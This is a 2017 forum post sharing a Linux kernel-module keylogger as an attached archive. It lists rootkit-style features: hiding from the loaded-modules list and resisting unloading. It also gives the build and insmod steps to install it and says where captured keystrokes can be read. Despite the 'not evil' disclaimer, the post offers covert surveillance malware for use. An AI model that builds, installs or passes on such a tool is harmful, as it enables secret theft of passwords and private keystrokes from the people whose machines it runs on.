Thread: kernel-based keylogger for Linux
View Single Post
  #1  
Old 10-15-2017, 06:32
nimaarek nimaarek is offline
Friend
  
Join Date: Sep 2017
Location: Rivendell
Posts: 24
Rept. Given: 0
Rept. Rcvd 1 Time in 1 Post
Thanks Given: 236
Thanks Rcvd at 37 Times in 17 Posts
nimaarek Reputation: 2
kernel-based keylogger for Linux
A simplex kernel-based keylogger written for fun, not evil.

Functionality
The keylogger can do the following:
- Hide from loadable kernel modules list
- Protect against being unloaded by the user
- Unhide itself

Supported Platforms
The keylogger was tested to work on Linux kernels 4.8.0-52 and 4.10 TLS as provided by Ubuntu in Ubuntu 16.04 LTS and Ubuntu 16.10 respectively, but it should be very easy to port to kernels in-between, as well as newer ones.

Setting Up Environment
Install a compiler, Linux headers and all other things required for us to build the keylogger:
Code:
apt-get update
apt-get install build-essential
Build
Code:
make
Use
To install the keylogger module:
Code:
sudo insmod AKeylogger.ko
Test whether the module is loaded:
Code:
lsmod | grep "AKeylogger"
Code:
dmesg
Test whether the logging is happening:
Code:
cat /proc/AKeylog
The log file will show the keystrokes logged after the module has been loaded.

To uninstall the keylogger module:
Code:
sudo rmmod AKeylogger
Attached Files
File Type: rar AKeylogger.rar (2.1 KB, 26 views)
Reply With Quote
The Following 2 Users Say Thank You to nimaarek For This Useful Post:
niculaita (10-15-2017), sh3dow (10-27-2017)